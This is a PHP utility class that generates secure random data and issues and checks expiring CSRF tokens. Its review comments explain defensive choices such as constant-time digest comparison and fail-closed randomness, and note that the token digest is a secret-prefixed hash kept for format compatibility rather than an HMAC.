<?php
namespace Cloudflare\APO;
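/**
 * Static helpers for generating random secrets and for issuing and checking
 * time-limited CSRF tokens.
 *
 * Token format: "<expiry>-<digest>", where <expiry> is an absolute Unix
 * timestamp and <digest> is the truncated SHA-512 hex digest produced by
 * hashFunction() over "sha512(secret)-user-expiry".
 *
 * NOTE(review): the digest is a secret-prefixed hash, not an HMAC. Moving to
 * hash_hmac() would change the token format and invalidate outstanding
 * tokens, so it is left as is here.
 */
class SecurityUtil
{
    /**
     * Returns 16 random bytes from a CSPRNG, hex-encoded (32 characters).
     *
     * Uses random_bytes() when available and openssl_random_pseudo_bytes()
     * otherwise. Fails closed: false is returned when no source exists, when
     * OpenSSL produces no output, or when OpenSSL reports that the bytes were
     * not generated by a cryptographically strong algorithm.
     *
     * @return bool|string hex string on success, false on failure
     *
     * @throws \Exception from random_bytes() if it cannot gather randomness
     */
    public static function generate16bytesOfSecureRandomData()
    {
        if (function_exists('random_bytes')) {
            return bin2hex(random_bytes(16));
        }

        if (!function_exists('openssl_random_pseudo_bytes')) {
            return false;
        }

        $wasItSecure = false;
        $randBytes = openssl_random_pseudo_bytes(16, $wasItSecure);

        // A false return must not reach bin2hex(): it would become an empty,
        // fully predictable "secret".
        if ($randBytes === false || $wasItSecure === false) {
            return false;
        }

        return bin2hex($randBytes);
    }

    /**
     * Builds a CSRF token bound to a user and an expiry time.
     *
     * @param string   $secret         a cryptographically strong secret
     * @param string   $user           a piece of unique user data
     * @param int|null $timeValidUntil absolute Unix timestamp at which the
     *                                 token expires; defaults to 24 hours
     *                                 (86400 seconds) from now
     *
     * @return string token in the form "<expiry>-<digest>"
     */
    public static function csrfTokenGenerate($secret, $user, $timeValidUntil = null)
    {
        if ($timeValidUntil === null) {
            $timeValidUntil = time() + 86400;
        }

        $hashedSecret = hash('sha512', $secret);
        $dataToHash = sprintf('%s-%s-%s', $hashedSecret, $user, $timeValidUntil);

        return sprintf('%s-%s', $timeValidUntil, static::hashFunction($dataToHash));
    }

    /**
     * Checks a token produced by csrfTokenGenerate() for the same secret and
     * user, and that its embedded expiry has not passed.
     *
     * @param string $secret a cryptographically strong secret
     * @param string $user   a piece of unique user data
     * @param string $token  the token that needs to be validated
     *
     * @return bool true only when the digest matches and the token is unexpired
     */
    public static function csrfTokenValidate($secret, $user, $token)
    {
        // The token is request-supplied; anything but a string is rejected
        // instead of being handed to explode().
        if (!is_string($token)) {
            return false;
        }

        $tokenParts = explode('-', $token);
        if (count($tokenParts) !== 2) {
            return false;
        }

        list($timeValidFor, $hash) = $tokenParts;

        // The expiry is compared with time() below; a non-numeric value would
        // make that comparison depend on the PHP version's string/int rules.
        if (!is_numeric($timeValidFor)) {
            return false;
        }

        $hashedSecret = hash('sha512', $secret);
        $dataToHash = sprintf('%s-%s-%s', $hashedSecret, $user, $timeValidFor);
        $expectedHash = static::hashFunction($dataToHash);

        // Constant-time comparison: a plain !== can return early at the first
        // differing byte, which leaks how much of the digest was correct.
        if (!static::constantTimeEquals($expectedHash, $hash)) {
            return false;
        }

        // The expiry is covered by the digest, so it is trusted only after
        // the digest has been verified.
        return !(time() > $timeValidFor);
    }

    /**
     * Hashes the data with SHA-512 and keeps the second half of the hex digest.
     *
     * @param string $data the data that will be hashed
     *
     * @return string the last 64 hex characters of the 128-character digest
     */
    private static function hashFunction($data)
    {
        return substr(hash('sha512', $data), 64);
    }

    /**
     * Compares two strings without short-circuiting on the first mismatch.
     *
     * Delegates to hash_equals() where it exists; the manual loop keeps the
     * class usable on runtimes that lack it, in line with the
     * function_exists() probing used for random_bytes().
     *
     * @param string $known    the value computed server-side
     * @param string $supplied the value taken from the token
     *
     * @return bool
     */
    private static function constantTimeEquals($known, $supplied)
    {
        if (function_exists('hash_equals')) {
            return hash_equals($known, $supplied);
        }

        $length = strlen($known);
        if ($length !== strlen($supplied)) {
            return false;
        }

        $diff = 0;
        for ($i = 0; $i < $length; $i++) {
            $diff |= ord($known[$i]) ^ ord($supplied[$i]);
        }

        return $diff === 0;
    }
}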